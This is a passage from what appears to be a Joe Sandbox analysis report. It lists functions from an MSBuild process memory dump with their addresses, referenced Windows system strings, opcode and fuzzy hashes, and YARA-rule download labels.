                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$MUI
                                                                                                              • API String ID: 0-17815947
                                                                                                              • Opcode ID: d1d27f96342ceb76c377954f69db6e296771c582dfb9e1f2b905f65be2d40000
                                                                                                              • Instruction ID: 3fb5bb57a998d1d217d41fa05b1d95eff9c170191b68ce9bdd7c593b5ee70bed
                                                                                                              • Opcode Fuzzy Hash: d1d27f96342ceb76c377954f69db6e296771c582dfb9e1f2b905f65be2d40000
                                                                                                              • Instruction Fuzzy Hash: 6B51F771E0021DAEEF11DFA9CC90AEFBBB9EB58758F14052AE611A7290D6349905CB60
                                                                                                              Function 013904E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0139063D
                                                                                                              • kLsE, xrefs: 01390540
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                              • API String ID: 0-2547482624
                                                                                                              • Opcode ID: 78e0aa514fb94e588b4444e045b9206ca395ae3944e86d5896e109d44b11c861
                                                                                                              • Instruction ID: 6a619ffe6342e90945cee4480df3e86283a88d4709145e7222718cb523a3400d
                                                                                                              • Opcode Fuzzy Hash: 78e0aa514fb94e588b4444e045b9206ca395ae3944e86d5896e109d44b11c861
                                                                                                              • Instruction Fuzzy Hash: 76519171504746DBDB28DF68C5806A7BBE9EF84318F10883EFAA987241E770D545CB91
                                                                                                              Function 0139A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 0139A309
                                                                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 0139A2FB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                              • API String ID: 0-2876891731
                                                                                                              • Opcode ID: 1735985ee6410ec8ebe97b7c7c494bc99a4092b6d8c3cda88dc9a2daef231b63
                                                                                                              • Instruction ID: c4628fb37362247b4da6d70ee4404aa13bb49f5f3c7a74188182e710100811ef
                                                                                                              • Opcode Fuzzy Hash: 1735985ee6410ec8ebe97b7c7c494bc99a4092b6d8c3cda88dc9a2daef231b63
                                                                                                              • Instruction Fuzzy Hash: FC419E31A04649DBEF15DF5DC880B6ABBB8FF84708F2441A9EE00DB695E3B5D940CB50
                                                                                                              Function 013CA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID: Cleanup Group$Threadpool!
                                                                                                              • API String ID: 2994545307-4008356553
                                                                                                              • Opcode ID: dc5c617d9ff57670ec51c56d19f787185d4314e01957b231be1e63a21f63c898
                                                                                                              • Instruction ID: 31e63c006b967779e8439b305b805baa8233e41f2c72bb5f6ba9e3ed56c69ba8
                                                                                                              • Opcode Fuzzy Hash: dc5c617d9ff57670ec51c56d19f787185d4314e01957b231be1e63a21f63c898
                                                                                                              • Instruction Fuzzy Hash: 4F01D1B2250748AFD311DF14CD45B1A77E8E784B2DF01893DA658C7190E334D814CB46
                                                                                                              Function 0139C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: MUI
                                                                                                              • API String ID: 0-1339004836
                                                                                                              • Opcode ID: 62ef868889099992713e721ef9be6224ba49e5fa9931418aef0d524a00705232
                                                                                                              • Instruction ID: f17b98fb741bfa77230585573f201c447236071ab505f102c85e516c8c9415c5
                                                                                                              • Opcode Fuzzy Hash: 62ef868889099992713e721ef9be6224ba49e5fa9931418aef0d524a00705232
                                                                                                              • Instruction Fuzzy Hash: AD825975E002198BEF25CFADC880BEDBBB5BF48718F148169E959AB391DB309D41CB50
                                                                                                              Function 01416420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID: 0-3916222277
                                                                                                              • Opcode ID: baee12931e032d93a5a4fa84e7cec24cc2a54747f65149cebae36699f0f317c4
                                                                                                              • Instruction ID: 9744991e5bfe53d0d70c1e2fed39c4ad6cda91154807d834bdf9d188137a5444
                                                                                                              • Opcode Fuzzy Hash: baee12931e032d93a5a4fa84e7cec24cc2a54747f65149cebae36699f0f317c4
                                                                                                              • Instruction Fuzzy Hash: 32916072901219AFEB21DB99DC85FEEBBB8EF54754F110065F604AB2A4D774E900CB60
                                                                                                              Function 0143E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID: 0-3916222277
                                                                                                              • Opcode ID: 8b385b1aeb97b4da1ce5bc43e5d4ef6dde1e8c7ec4569b2961624267327c5254
                                                                                                              • Instruction ID: 7ac4abb1b70038466b5b95ac35dd7df8aa735850b09cebac85350474c3a89e23
                                                                                                              • Opcode Fuzzy Hash: 8b385b1aeb97b4da1ce5bc43e5d4ef6dde1e8c7ec4569b2961624267327c5254
                                                                                                              • Instruction Fuzzy Hash: 38918172902609BFDB22AFA9DC44FEFBB79EF89754F10001AF605A7260D7759902CB50
                                                                                                              Function 013CA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: GlobalTags
                                                                                                              • API String ID: 0-1106856819
                                                                                                              • Opcode ID: f95e3c24695b36c738e442ea6c612a4dd315446e0b844ebe553eb2428dccaf36
                                                                                                              • Instruction ID: 9c433b71ce49ed599424b76fecd8dd7b901a6a091b43ddce7e9539263f7a133b
                                                                                                              • Opcode Fuzzy Hash: f95e3c24695b36c738e442ea6c612a4dd315446e0b844ebe553eb2428dccaf36
                                                                                                              • Instruction Fuzzy Hash: BE718FB5E0121A8FDF29CF9EC5906AEBBB1BF48714F15813EE506A7390E7318911CB60
                                                                                                              Function 01434978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .mui
                                                                                                              • API String ID: 0-1199573805
                                                                                                              • Opcode ID: 11b5c2164c211b69365416ae346c6a03228a8c512b2b0a35cd0a88474a75bf4f
                                                                                                              • Instruction ID: ea7c6f9d384cc893b3436341654e749f55326115d086551b68f2fac7a4df9cd9
                                                                                                              • Opcode Fuzzy Hash: 11b5c2164c211b69365416ae346c6a03228a8c512b2b0a35cd0a88474a75bf4f
                                                                                                              • Instruction Fuzzy Hash: 4F519672D002299BDF14DF9DD840AEEBBB8AF48654F09416AE911BB360D7749D02CBE4
                                                                                                              Function 013AE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: EXT-
                                                                                                              • API String ID: 0-1948896318
                                                                                                              • Opcode ID: 062fd1c037de12745e5a93ec609e7b7c887435b6bda854c71b61417781cda782
                                                                                                              • Instruction ID: 08a7e2ecb6a2496ac3bd74b3a56d667ce84f5529037feaf38ee6363b6cd65044
                                                                                                              • Opcode Fuzzy Hash: 062fd1c037de12745e5a93ec609e7b7c887435b6bda854c71b61417781cda782
                                                                                                              • Instruction Fuzzy Hash: 69418072508302ABD710DA79C980B6BBBECEF8871CF840A3DF684D7140E675D908C792
                                                                                                              Function 0140C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: BinaryHash
                                                                                                              • API String ID: 0-2202222882
                                                                                                              • Opcode ID: a628740baa215a3a33289030794e7652d1b8f3b8561187c32405bb57a45a5530
                                                                                                              • Instruction ID: abbacb9c1f285d2bb3e93f22ecc49f733f496ae3a030888e0c6bf03f0376c22d
                                                                                                              • Opcode Fuzzy Hash: a628740baa215a3a33289030794e7652d1b8f3b8561187c32405bb57a45a5530
                                                                                                              • Instruction Fuzzy Hash: 614167B2D0012DEBDB21DA55DC84FDEB77CAB54718F0045E6E608AB190DB709F498F98
                                                                                                              Function 01426B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: #
                                                                                                              • API String ID: 0-1885708031
                                                                                                              • Opcode ID: c5c9ab520354a4363ca080123e75639c6b9447f8a9ccbe34b2a75e878d8cc4c5
                                                                                                              • Instruction ID: 9562b699b7a76d611f8de2df8945ae53167c7a888796d087c1d1d0ce326e0f52
                                                                                                              • Opcode Fuzzy Hash: c5c9ab520354a4363ca080123e75639c6b9447f8a9ccbe34b2a75e878d8cc4c5
                                                                                                              • Instruction Fuzzy Hash: F8312C31A007699BDB32EF6EC850BEFBBA9DF04704F95402AED40AB2A1D775D845CB50
                                                                                                              Function 0140CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: BinaryName
                                                                                                              • API String ID: 0-215506332
                                                                                                              • Opcode ID: b4df7ffbcc29db44adde1819f230701dfba6cb958fdabb2850d1d4eccb88051a
                                                                                                              • Instruction ID: 22f63b7e6c296bd269e649ae141b3dde5b2c7f9a0f7cbd1588a5c8f1fa0a48b9
                                                                                                              • Opcode Fuzzy Hash: b4df7ffbcc29db44adde1819f230701dfba6cb958fdabb2850d1d4eccb88051a
                                                                                                              • Instruction Fuzzy Hash: 9331D636900915EFDB16DB5AD885E6FBB74EB80714F1142BAE905A72A0D7309D04DBD0
                                                                                                              Function 0141892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0141895E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                              • API String ID: 0-702105204
                                                                                                              • Opcode ID: 332ff567195335356542a0f63a269f0ad29c168a98379d02283c459a71fd17d2
                                                                                                              • Instruction ID: 1be6bc75711fb7b5a63710190a383099081239084f78b6a1203d2d63b3d0f1ae
                                                                                                              • Opcode Fuzzy Hash: 332ff567195335356542a0f63a269f0ad29c168a98379d02283c459a71fd17d2
                                                                                                              • Instruction Fuzzy Hash: 9E012B323202039BE7306F5ADC84B6F7F66EF91668B04042FF6450A279CF306881CB92
                                                                                                              Function 01432000 Relevance: .8, Instructions: 757COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4726947a9c33cf27ba3306ca8e7cc0ca9650f8417f09259007cd5b937b62acca
                                                                                                              • Instruction ID: 320b390640fd2aa50a4bcfe9f8ddfd474868c75e77df23ea6701ced4bb142ee3
                                                                                                              • Opcode Fuzzy Hash: 4726947a9c33cf27ba3306ca8e7cc0ca9650f8417f09259007cd5b937b62acca
                                                                                                              • Instruction Fuzzy Hash: EC42A0356083419BDB25CF68C890E6BBBE5BFD8704F08492EFA8697360D7B0D945CB52
                                                                                                              Function 01428158 Relevance: .6, Instructions: 617COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cae3a7d79a1464afe36aa8f79f41c48daa36a010130e6bc038abebf0ecdf6be9
                                                                                                              • Instruction ID: 46d90426804b5bb3770b991ac67cfedee34d0467092359e1bd8b63663ea979dc
                                                                                                              • Opcode Fuzzy Hash: cae3a7d79a1464afe36aa8f79f41c48daa36a010130e6bc038abebf0ecdf6be9
                                                                                                              • Instruction Fuzzy Hash: 8C425175E0022A8FEB24CF69C881BAEBBF5BF44304F54819AE949EB351D7349985CF50
                                                                                                              Function 013A2840 Relevance: .6, Instructions: 605COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 25fd663175efaef0a30091640e33268b38514d10d82ad7caab3c6f9ead2604dc
                                                                                                              • Instruction ID: 76c74febbb30449f79854021a4bf85e59344c2cc3a3469acec38c65c34ce7bcb
                                                                                                              • Opcode Fuzzy Hash: 25fd663175efaef0a30091640e33268b38514d10d82ad7caab3c6f9ead2604dc
                                                                                                              • Instruction Fuzzy Hash: F03200B0A007598FEB24CF69C8457BEBBF6FF84708F14411DD68A9B685D735A806CB50
                                                                                                              Function 0143A118 Relevance: .6, Instructions: 591COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8a5153f944d0107d94204ecda6c130841e47b097d284675a61fbf293dbd6ac3e
                                                                                                              • Instruction ID: 1587f1a95e7e92b57b43634c7418869b9cd1e84ebd4245583dddcc3a2e2aa7cd
                                                                                                              • Opcode Fuzzy Hash: 8a5153f944d0107d94204ecda6c130841e47b097d284675a61fbf293dbd6ac3e
                                                                                                              • Instruction Fuzzy Hash: F622DE702846618BEB25CF2DC094376BBF1AF89304F28845BD9D6CB3A6D335E452DB61
                                                                                                              Function 01396A50 Relevance: .5, Instructions: 548COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1b304a36465f135c6c931c5e9174b8f94e11a23a86d712d344eb3d9572bb641d
                                                                                                              • Instruction ID: 887e88051fd33662ac420259daca391419ba29c36026bbad38ee73175f5df493
                                                                                                              • Opcode Fuzzy Hash: 1b304a36465f135c6c931c5e9174b8f94e11a23a86d712d344eb3d9572bb641d
                                                                                                              • Instruction Fuzzy Hash: 87328CB1A01209CFDF25CF69D480AAABBF5FF48308F14456EE95AAB751D734E841CB50
                                                                                                              Function 013B4A35 Relevance: .4, Instructions: 423COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                              • Instruction ID: 4922e9b4f1fd8952b0f0f93874ce03efcf3e5f74528a70392bbe2008b7f02fb3
                                                                                                              • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                              • Instruction Fuzzy Hash: FBF17E70E0021A9BDF15CF99C580BEEBBF5AF48718F04812DEA06AB746E774D941CB64
                                                                                                              Function 0142892B Relevance: .4, Instructions: 386COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 205a8ad049f3d46acd2f628a297cbbf3b3cc0a0a69381097f24efcb6ff73eaac
                                                                                                              • Instruction ID: f179952ad06752049ac36d546b70ea5d23f73bdd12f55b0254955a55ce6cd732
                                                                                                              • Opcode Fuzzy Hash: 205a8ad049f3d46acd2f628a297cbbf3b3cc0a0a69381097f24efcb6ff73eaac
                                                                                                              • Instruction Fuzzy Hash: 93D11271E0062A8BDF05CF59C840AFFBBF1BF88304F98816AD955A7251DB35E946CB60
                                                                                                              Function 013965D0 Relevance: .4, Instructions: 383COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2d5751581ba040e6ed96bf8e136485757672a69766f8d8e5fd793fea54729b10
                                                                                                              • Instruction ID: 12a4002677a323dd3c252b26bd84878b85b2469f50c51641be7adb793c5f5a0a
                                                                                                              • Opcode Fuzzy Hash: 2d5751581ba040e6ed96bf8e136485757672a69766f8d8e5fd793fea54729b10
                                                                                                              • Instruction Fuzzy Hash: 86E190B1509346CFCB15CF28C490A6ABBE4FF89318F05896DF99987351EB31E905CB92
                                                                                                              Function 01388397 Relevance: .4, Instructions: 380COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4741df7ce6d601125f5ed91fe6ed8e91f0947cb38bcafc637d8915c2d7c20eae
                                                                                                              • Instruction ID: 35095f2618dd18382cb16d009d0b3f2d9bf8209d2472973db5dc63a0dc19a1cf
                                                                                                              • Opcode Fuzzy Hash: 4741df7ce6d601125f5ed91fe6ed8e91f0947cb38bcafc637d8915c2d7c20eae
                                                                                                              • Instruction Fuzzy Hash: 66D1DF72A0031ADBDB15EF68C880ABAB7F5BF5431CF444669EA16DB2C0E734E951CB50
                                                                                                              Function 01418243 Relevance: .3, Instructions: 322COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                              • Instruction ID: 88550fd355b0d887ecc3d8bdd59882ab0ec43991832a95ba687110eff0f4ef95
                                                                                                              • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                              • Instruction Fuzzy Hash: E1B1A775A006069FDF25DF59C940EEBBBB9FF94304F14442EAA02977A8DB34E905CB10
                                                                                                              Function 013A0535 Relevance: .3, Instructions: 300COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                              • Instruction ID: 7a62ade0298bb26fca691a021162d701244b4f576d6d23bd5515c1cdd86aee54
                                                                                                              • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                              • Instruction Fuzzy Hash: 3FB1F631604646EFDB29DBA8C850BBFBBFAEF44308F540159E69697291DB30ED41CB90
                                                                                                              Function 013983C0 Relevance: .3, Instructions: 281COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4a1949ed08a8fe89c3e85af1a55ad08363d2726559f21698c20353d31e6e24ed
                                                                                                              • Instruction ID: d957111fc5a90f767a2863d18f377533054ddb5e041534ca00e29d9fc72960b1
                                                                                                              • Opcode Fuzzy Hash: 4a1949ed08a8fe89c3e85af1a55ad08363d2726559f21698c20353d31e6e24ed
                                                                                                              • Instruction Fuzzy Hash: 46C15770208345CFEB64CF19C494BABB7E5BF98308F44496DEA8997291D774E908CF92
                                                                                                              Function 0138C427 Relevance: .3, Instructions: 280COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8b04dddf6a3f0f3f46a0204d9babacd5b705a59dd0e9b440ba180aa026e0f133
                                                                                                              • Instruction ID: 0ea8ea643c87c5c53d064cf8e4f2a5aec2917deb378a49b14376f9074539849b
                                                                                                              • Opcode Fuzzy Hash: 8b04dddf6a3f0f3f46a0204d9babacd5b705a59dd0e9b440ba180aa026e0f133
                                                                                                              • Instruction Fuzzy Hash: 33B16070A003698BDB64DF69C890BA9B7F5EF44708F0485EAD54AA7281EB309D85CB31
                                                                                                              Function 013BE5E7 Relevance: .3, Instructions: 278COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 05579e8ff9ed75d2546b5bd3a87fed5a257aea7215a56c54c21263c873c41d2e
                                                                                                              • Instruction ID: fee735f078e673335d56462452a99d5fb4069a8781f18d2374a807e4ced970db
                                                                                                              • Opcode Fuzzy Hash: 05579e8ff9ed75d2546b5bd3a87fed5a257aea7215a56c54c21263c873c41d2e
                                                                                                              • Instruction Fuzzy Hash: F5A1E632E006599FEB21DB5CC884BEEBBA8AB01718F050169EF11AB691E7749D41CBD1
                                                                                                              Function 013D0185 Relevance: .3, Instructions: 276COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, Offset: 01360000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_1360000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 68f0e998a476c67a5308346dc6ffb2ef60589c6b94b0efbe271a4bfe6a517008
                                                                                                              • Instruction ID: 13309a13be3d033c16ef243bd4df6bf3f8c7fe4dd058f3e413dd38c66225448a
